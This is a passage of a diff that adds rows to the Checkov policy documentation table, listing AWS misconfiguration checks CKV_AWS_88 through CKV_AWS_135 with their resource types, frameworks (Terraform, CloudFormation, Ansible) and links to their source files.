| Terraform | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2PublicIP.py) | +| 375 | CKV_AWS_88 | resource | aws_launch_template | EC2 instance should not have public IP. | Terraform | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2PublicIP.py) | +| 376 | CKV_AWS_89 | resource | AWS::DMS::ReplicationInstance | DMS replication instance should not be publicly accessible | Cloudformation | [DMSReplicationInstancePubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DMSReplicationInstancePubliclyAccessible.py) | +| 377 | CKV_AWS_89 | resource | aws_dms_replication_instance | DMS replication instance should not be publicly accessible | Terraform | [DMSReplicationInstancePubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DMSReplicationInstancePubliclyAccessible.py) | +| 378 | CKV_AWS_90 | resource | AWS::DocDB::DBClusterParameterGroup | Ensure DocumentDB TLS is not disabled | Cloudformation | [DocDBTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DocDBTLS.py) | +| 379 | CKV_AWS_90 | resource | aws_docdb_cluster_parameter_group | Ensure DocumentDB TLS is not disabled | Terraform | [DocDBTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBTLS.py) | +| 380 | CKV_AWS_91 | resource | AWS::ElasticLoadBalancingV2::LoadBalancer | Ensure the ELBv2 (Application/Network) has access logging enabled | Cloudformation | [ELBv2AccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ELBv2AccessLogs.py) | +| 381 | CKV_AWS_91 | resource | aws_alb | Ensure the ELBv2 (Application/Network) has access logging enabled | Terraform | 
[ELBv2AccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBv2AccessLogs.py) | +| 382 | CKV_AWS_91 | resource | aws_lb | Ensure the ELBv2 (Application/Network) has access logging enabled | Terraform | [ELBv2AccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBv2AccessLogs.py) | +| 383 | CKV_AWS_92 | resource | AWS::ElasticLoadBalancing::LoadBalancer | Ensure the ELB has access logging enabled | Cloudformation | [ELBAccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ELBAccessLogs.py) | +| 384 | CKV_AWS_92 | resource | aws_elb | Ensure the ELB has access logging enabled | Terraform | [ELBAccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBAccessLogs.py) | +| 385 | CKV_AWS_93 | resource | aws_s3_bucket | Ensure S3 bucket policy does not lockout all but root user. (Prevent lockouts needing root account fixes) | Terraform | [S3ProtectAgainstPolicyLockout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3ProtectAgainstPolicyLockout.py) | +| 386 | CKV_AWS_93 | resource | aws_s3_bucket_policy | Ensure S3 bucket policy does not lockout all but root user. 
(Prevent lockouts needing root account fixes) | Terraform | [S3ProtectAgainstPolicyLockout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3ProtectAgainstPolicyLockout.py) | +| 387 | CKV_AWS_94 | resource | AWS::Glue::DataCatalogEncryptionSettings | Ensure Glue Data Catalog Encryption is enabled | Cloudformation | [GlueDataCatalogEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueDataCatalogEncryption.py) | +| 388 | CKV_AWS_94 | resource | aws_glue_data_catalog_encryption_settings | Ensure Glue Data Catalog Encryption is enabled | Terraform | [GlueDataCatalogEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlueDataCatalogEncryption.py) | +| 389 | CKV_AWS_95 | resource | AWS::ApiGatewayV2::Stage | Ensure API Gateway V2 has Access Logging enabled | Cloudformation | [APIGatewayV2AccessLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayV2AccessLogging.py) | +| 390 | CKV_AWS_95 | resource | AWS::Serverless::HttpApi | Ensure API Gateway V2 has Access Logging enabled | Cloudformation | [APIGatewayV2AccessLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayV2AccessLogging.py) | +| 391 | CKV_AWS_96 | resource | AWS::RDS::DBCluster | Ensure all data stored in Aurora is securely encrypted at rest | Cloudformation | [AuroraEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/AuroraEncryption.py) | +| 392 | CKV_AWS_96 | resource | aws_rds_cluster | Ensure all data stored in Aurora is securely encrypted at rest | Terraform | [AuroraEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AuroraEncryption.py) | +| 393 | CKV_AWS_97 | resource | AWS::ECS::TaskDefinition | Ensure Encryption in transit 
is enabled for EFS volumes in ECS Task definitions | Cloudformation | [ECSTaskDefinitionEFSVolumeEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ECSTaskDefinitionEFSVolumeEncryption.py) | +| 394 | CKV_AWS_97 | resource | aws_ecs_task_definition | Ensure Encryption in transit is enabled for EFS volumes in ECS Task definitions | Terraform | [ECSTaskDefinitionEFSVolumeEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSTaskDefinitionEFSVolumeEncryption.py) | +| 395 | CKV_AWS_98 | resource | aws_sagemaker_endpoint_configuration | Ensure all data stored in the Sagemaker Endpoint is securely encrypted at rest | Terraform | [SagemakerEndpointConfigurationEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerEndpointConfigurationEncryption.py) | +| 396 | CKV_AWS_99 | resource | AWS::Glue::SecurityConfiguration | Ensure Glue Security Configuration Encryption is enabled | Cloudformation | [GlueSecurityConfiguration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueSecurityConfiguration.py) | +| 397 | CKV_AWS_99 | resource | aws_glue_security_configuration | Ensure Glue Security Configuration Encryption is enabled | Terraform | [GlueSecurityConfiguration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlueSecurityConfiguration.py) | +| 398 | CKV_AWS_100 | resource | AWS::EKS::Nodegroup | Ensure AWS EKS node group does not have implicit SSH access from 0.0.0.0/0 | Cloudformation | [EKSNodeGroupRemoteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/EKSNodeGroupRemoteAccess.py) | +| 399 | CKV_AWS_100 | resource | aws_eks_node_group | Ensure AWS EKS node group does not have implicit SSH access from 0.0.0.0/0 | Terraform | 
[EKSNodeGroupRemoteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSNodeGroupRemoteAccess.py) | +| 400 | CKV_AWS_101 | resource | AWS::Neptune::DBCluster | Ensure Neptune logging is enabled | Cloudformation | [NeptuneClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/NeptuneClusterLogging.py) | +| 401 | CKV_AWS_101 | resource | aws_neptune_cluster | Ensure Neptune logging is enabled | Terraform | [NeptuneClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterLogging.py) | +| 402 | CKV_AWS_102 | resource | aws_neptune_cluster_instance | Ensure Neptune Cluster instance is not publicly available | Terraform | [NeptuneClusterInstancePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterInstancePublic.py) | +| 403 | CKV_AWS_103 | resource | AWS::ElasticLoadBalancingV2::Listener | Ensure that Load Balancer Listener is using at least TLS v1.2 | Cloudformation | [ALBListenerTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ALBListenerTLS12.py) | +| 404 | CKV_AWS_103 | resource | aws_alb_listener | Ensure that load balancer is using at least TLS 1.2 | Terraform | [AppLoadBalancerTLS12.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AppLoadBalancerTLS12.yaml) | +| 405 | CKV_AWS_103 | resource | aws_lb | Ensure that load balancer is using at least TLS 1.2 | Terraform | [AppLoadBalancerTLS12.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AppLoadBalancerTLS12.yaml) | +| 406 | CKV_AWS_103 | resource | aws_lb_listener | Ensure that load balancer is using at least TLS 1.2 | Terraform | 
[AppLoadBalancerTLS12.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AppLoadBalancerTLS12.yaml) | +| 407 | CKV_AWS_104 | resource | AWS::DocDB::DBClusterParameterGroup | Ensure DocumentDB has audit logs enabled | Cloudformation | [DocDBAuditLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DocDBAuditLogs.py) | +| 408 | CKV_AWS_104 | resource | aws_docdb_cluster_parameter_group | Ensure DocumentDB has audit logs enabled | Terraform | [DocDBAuditLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBAuditLogs.py) | +| 409 | CKV_AWS_105 | resource | AWS::Redshift::ClusterParameterGroup | Ensure Redshift uses SSL | Cloudformation | [RedShiftSSL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RedShiftSSL.py) | +| 410 | CKV_AWS_105 | resource | aws_redshift_parameter_group | Ensure Redshift uses SSL | Terraform | [RedShiftSSL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedShiftSSL.py) | +| 411 | CKV_AWS_106 | resource | aws_ebs_encryption_by_default | Ensure EBS default encryption is enabled | Terraform | [EBSDefaultEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EBSDefaultEncryption.py) | +| 412 | CKV_AWS_107 | resource | AWS::IAM::Group | Ensure IAM policies does not allow credentials exposure | Cloudformation | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMCredentialsExposure.py) | +| 413 | CKV_AWS_107 | resource | AWS::IAM::ManagedPolicy | Ensure IAM policies does not allow credentials exposure | Cloudformation | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMCredentialsExposure.py) | +| 414 | CKV_AWS_107 | resource | 
AWS::IAM::Policy | Ensure IAM policies does not allow credentials exposure | Cloudformation | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMCredentialsExposure.py) |
+| 415 | CKV_AWS_107 | resource | AWS::IAM::Role | Ensure IAM policies does not allow credentials exposure | Cloudformation | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMCredentialsExposure.py) |
+| 416 | CKV_AWS_107 | resource | AWS::IAM::User | Ensure IAM policies does not allow credentials exposure | Cloudformation | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMCredentialsExposure.py) |
+| 417 | CKV_AWS_107 | data | aws_iam_policy_document | Ensure IAM policies does not allow credentials exposure | Terraform | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMCredentialsExposure.py) |
+| 418 | CKV_AWS_108 | resource | AWS::IAM::Group | Ensure IAM policies does not allow data exfiltration | Cloudformation | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMDataExfiltration.py) |
+| 419 | CKV_AWS_108 | resource | AWS::IAM::ManagedPolicy | Ensure IAM policies does not allow data exfiltration | Cloudformation | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMDataExfiltration.py) |
+| 420 | CKV_AWS_108 | resource | AWS::IAM::Policy | Ensure IAM policies does not allow data exfiltration | Cloudformation | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMDataExfiltration.py) |
+| 421 | CKV_AWS_108 | resource | AWS::IAM::Role | Ensure IAM policies does not allow data exfiltration | Cloudformation | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMDataExfiltration.py) |
+| 422 | CKV_AWS_108 | resource | AWS::IAM::User | Ensure IAM policies does not allow data exfiltration | Cloudformation | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMDataExfiltration.py) |
+| 423 | CKV_AWS_108 | data | aws_iam_policy_document | Ensure IAM policies does not allow data exfiltration | Terraform | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMDataExfiltration.py) |
+| 424 | CKV_AWS_109 | resource | AWS::IAM::Group | Ensure IAM policies does not allow permissions management without constraints | Cloudformation | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPermissionsManagement.py) |
+| 425 | CKV_AWS_109 | resource | AWS::IAM::ManagedPolicy | Ensure IAM policies does not allow permissions management without constraints | Cloudformation | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPermissionsManagement.py) |
+| 426 | CKV_AWS_109 | resource | AWS::IAM::Policy | Ensure IAM policies does not allow permissions management without constraints | Cloudformation | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPermissionsManagement.py) |
+| 427 | CKV_AWS_109 | resource | AWS::IAM::Role | Ensure IAM policies does not allow permissions management without constraints | Cloudformation | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPermissionsManagement.py) |
+| 428 | CKV_AWS_109 | resource | AWS::IAM::User | Ensure IAM policies does not allow permissions management without constraints | Cloudformation | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPermissionsManagement.py) |
+| 429 | CKV_AWS_109 | data | aws_iam_policy_document | Ensure IAM policies does not allow permissions management / resource exposure without constraints | Terraform | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMPermissionsManagement.py) |
+| 430 | CKV_AWS_110 | resource | AWS::IAM::Group | Ensure IAM policies does not allow privilege escalation | Cloudformation | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPrivilegeEscalation.py) |
+| 431 | CKV_AWS_110 | resource | AWS::IAM::ManagedPolicy | Ensure IAM policies does not allow privilege escalation | Cloudformation | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPrivilegeEscalation.py) |
+| 432 | CKV_AWS_110 | resource | AWS::IAM::Policy | Ensure IAM policies does not allow privilege escalation | Cloudformation | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPrivilegeEscalation.py) |
+| 433 | CKV_AWS_110 | resource | AWS::IAM::Role | Ensure IAM policies does not allow privilege escalation | Cloudformation | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPrivilegeEscalation.py) |
+| 434 | CKV_AWS_110 | resource | AWS::IAM::User | Ensure IAM policies does not allow privilege escalation | Cloudformation | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPrivilegeEscalation.py) |
+| 435 | CKV_AWS_110 | data | aws_iam_policy_document | Ensure IAM policies does not allow privilege escalation | Terraform | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMPrivilegeEscalation.py) |
+| 436 | CKV_AWS_111 | resource | AWS::IAM::Group | Ensure IAM policies does not allow write access without constraints | Cloudformation | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMWriteAccess.py) |
+| 437 | CKV_AWS_111 | resource | AWS::IAM::ManagedPolicy | Ensure IAM policies does not allow write access without constraints | Cloudformation | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMWriteAccess.py) |
+| 438 | CKV_AWS_111 | resource | AWS::IAM::Policy | Ensure IAM policies does not allow write access without constraints | Cloudformation | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMWriteAccess.py) |
+| 439 | CKV_AWS_111 | resource | AWS::IAM::Role | Ensure IAM policies does not allow write access without constraints | Cloudformation | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMWriteAccess.py) |
+| 440 | CKV_AWS_111 | resource | AWS::IAM::User | Ensure IAM policies does not allow write access without constraints | Cloudformation | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMWriteAccess.py) |
+| 441 | CKV_AWS_111 | data | aws_iam_policy_document | Ensure IAM policies does not allow write access without constraints | Terraform | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMWriteAccess.py) |
+| 442 | CKV_AWS_112 | resource | aws_ssm_document | Ensure Session Manager data is encrypted in transit | Terraform | [SSMSessionManagerDocumentEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SSMSessionManagerDocumentEncryption.py) |
+| 443 | CKV_AWS_113 | resource | aws_ssm_document | Ensure Session Manager logs are enabled and encrypted | Terraform | [SSMSessionManagerDocumentLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SSMSessionManagerDocumentLogging.py) |
+| 444 | CKV_AWS_114 | resource | aws_emr_cluster | Ensure that EMR clusters with Kerberos have Kerberos Realm set | Terraform | [EMRClusterKerberosAttributes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EMRClusterKerberosAttributes.py) |
+| 445 | CKV_AWS_115 | resource | AWS::Lambda::Function | Ensure that AWS Lambda function is configured for function-level concurrent execution limit | Cloudformation | [LambdaFunctionLevelConcurrentExecutionLimit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaFunctionLevelConcurrentExecutionLimit.py) |
+| 446 | CKV_AWS_115 | resource | AWS::Serverless::Function | Ensure that AWS Lambda function is configured for function-level concurrent execution limit | Cloudformation | [LambdaFunctionLevelConcurrentExecutionLimit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaFunctionLevelConcurrentExecutionLimit.py) |
+| 447 | CKV_AWS_115 | resource | aws_lambda_function | Ensure that AWS Lambda function is configured for function-level concurrent execution limit | Terraform | [LambdaFunctionLevelConcurrentExecutionLimit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaFunctionLevelConcurrentExecutionLimit.py) |
+| 448 | CKV_AWS_116 | resource | AWS::Lambda::Function | Ensure that AWS Lambda function is configured for a Dead Letter Queue(DLQ) | Cloudformation | [LambdaDLQConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaDLQConfigured.py) |
+| 449 | CKV_AWS_116 | resource | AWS::Serverless::Function | Ensure that AWS Lambda function is configured for a Dead Letter Queue(DLQ) | Cloudformation | [LambdaDLQConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaDLQConfigured.py) |
+| 450 | CKV_AWS_116 | resource | aws_lambda_function | Ensure that AWS Lambda function is configured for a Dead Letter Queue(DLQ) | Terraform | [LambdaDLQConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaDLQConfigured.py) |
+| 451 | CKV_AWS_117 | resource | AWS::Lambda::Function | Ensure that AWS Lambda function is configured inside a VPC | Cloudformation | [LambdaInVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaInVPC.py) |
+| 452 | CKV_AWS_117 | resource | AWS::Serverless::Function | Ensure that AWS Lambda function is configured inside a VPC | Cloudformation | [LambdaInVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaInVPC.py) |
+| 453 | CKV_AWS_117 | resource | aws_lambda_function | Ensure that AWS Lambda function is configured inside a VPC | Terraform | [LambdaInVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaInVPC.py) |
+| 454 | CKV_AWS_118 | resource | AWS::RDS::DBInstance | Ensure that enhanced monitoring is enabled for Amazon RDS instances | Cloudformation | [RDSEnhancedMonitorEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RDSEnhancedMonitorEnabled.py) |
+| 455 | CKV_AWS_118 | resource | aws_db_instance | Ensure that enhanced monitoring is enabled for Amazon RDS instances | Terraform | [RDSEnhancedMonitorEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSEnhancedMonitorEnabled.py) |
+| 456 | CKV_AWS_118 | resource | aws_rds_cluster_instance | Ensure that enhanced monitoring is enabled for Amazon RDS instances | Terraform | [RDSEnhancedMonitorEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSEnhancedMonitorEnabled.py) |
+| 457 | CKV_AWS_119 | resource | AWS::DynamoDB::Table | Ensure DynamoDB Tables are encrypted using a KMS Customer Managed CMK | Cloudformation | [DynamoDBTablesEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DynamoDBTablesEncrypted.py) |
+| 458 | CKV_AWS_119 | resource | aws_dynamodb_table | Ensure DynamoDB Tables are encrypted using a KMS Customer Managed CMK | Terraform | [DynamoDBTablesEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DynamoDBTablesEncrypted.py) |
+| 459 | CKV_AWS_120 | resource | AWS::ApiGateway::Stage | Ensure API Gateway caching is enabled | Cloudformation | [APIGatewayCacheEnable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayCacheEnable.py) |
+| 460 | CKV_AWS_120 | resource | AWS::Serverless::Api | Ensure API Gateway caching is enabled | Cloudformation | [APIGatewayCacheEnable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayCacheEnable.py) |
+| 461 | CKV_AWS_120 | resource | aws_api_gateway_stage | Ensure API Gateway caching is enabled | Terraform | [APIGatewayCacheEnable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayCacheEnable.py) |
+| 462 | CKV_AWS_121 | resource | aws_config_configuration_aggregator | Ensure AWS Config is enabled in all regions | Terraform | [ConfigConfgurationAggregatorAllRegions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ConfigConfgurationAggregatorAllRegions.py) |
+| 463 | CKV_AWS_122 | resource | aws_sagemaker_notebook_instance | Ensure that direct internet access is disabled for an Amazon SageMaker Notebook Instance | Terraform | [SageMakerInternetAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SageMakerInternetAccessDisabled.py) |
+| 464 | CKV_AWS_123 | resource | AWS::EC2::VPCEndpointService | Ensure that VPC Endpoint Service is configured for Manual Acceptance | Cloudformation | [VPCEndpointAcceptanceConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/VPCEndpointAcceptanceConfigured.py) |
+| 465 | CKV_AWS_123 | resource | aws_vpc_endpoint_service | Ensure that VPC Endpoint Service is configured for Manual Acceptance | Terraform | [VPCEndpointAcceptanceConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/VPCEndpointAcceptanceConfigured.py) |
+| 466 | CKV_AWS_124 | resource | aws_cloudformation_stack | Ensure that CloudFormation stacks are sending event notifications to an SNS topic | Terraform | [CloudformationStackNotificationArns.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudformationStackNotificationArns.py) |
+| 467 | CKV_AWS_126 | resource | aws_instance | Ensure that detailed monitoring is enabled for EC2 instances | Terraform | [EC2DetailedMonitoringEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2DetailedMonitoringEnabled.py) |
+| 468 | CKV_AWS_127 | resource | aws_elb | Ensure that Elastic Load Balancer(s) uses SSL certificates provided by AWS Certificate Manager | Terraform | [ELBUsesSSL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBUsesSSL.py) |
+| 469 | CKV_AWS_129 | resource | aws_db_instance | Ensure that respective logs of Amazon Relational Database Service (Amazon RDS) are enabled | Terraform | [DBInstanceLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBInstanceLogging.py) |
+| 470 | CKV_AWS_130 | resource | aws_subnet | Ensure VPC subnets do not assign public IP by default | Terraform | [SubnetPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SubnetPublicIP.py) |
+| 471 | CKV_AWS_131 | resource | AWS::ElasticLoadBalancingV2::LoadBalancer | Ensure that ALB drops HTTP headers | Cloudformation | [ALBDropHttpHeaders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ALBDropHttpHeaders.py) |
+| 472 | CKV_AWS_131 | resource | aws_alb | Ensure that ALB drops HTTP headers | Terraform | [ALBDropHttpHeaders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBDropHttpHeaders.py) |
+| 473 | CKV_AWS_131 | resource | aws_lb | Ensure that ALB drops HTTP headers | Terraform | [ALBDropHttpHeaders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBDropHttpHeaders.py) |
+| 474 | CKV_AWS_133 | resource | aws_db_instance | Ensure that RDS instances has backup policy | Terraform | [DBInstanceBackupRetentionPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBInstanceBackupRetentionPeriod.py) |
+| 475 | CKV_AWS_133 | resource | aws_rds_cluster | Ensure that RDS instances has backup policy | Terraform | [DBInstanceBackupRetentionPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBInstanceBackupRetentionPeriod.py) |
+| 476 | CKV_AWS_134 | resource | aws_elasticache_cluster | Ensure that Amazon ElastiCache Redis clusters have automatic backup turned on | Terraform | [ElasticCacheAutomaticBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticCacheAutomaticBackup.py) |
+| 477 | CKV_AWS_135 | resource | [?"amazon.aws.ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) |
+| 478 | CKV_AWS_135 | resource | [?"ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) |
+| 479 | CKV_AWS_135 | resource | [].block[?"amazon.aws.ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) |
+| 480 | CKV_AWS_135 | resource | [].block[?"ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) |
+| 481 | CKV_AWS_135 | resource | [].block[].block[?"amazon.aws.ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) |
+| 482 | CKV_AWS_135 | resource | [].block[].block[?"ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) |
+| 483 | CKV_AWS_135 | resource | [].block[].block[].block[?"amazon.aws.ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) |
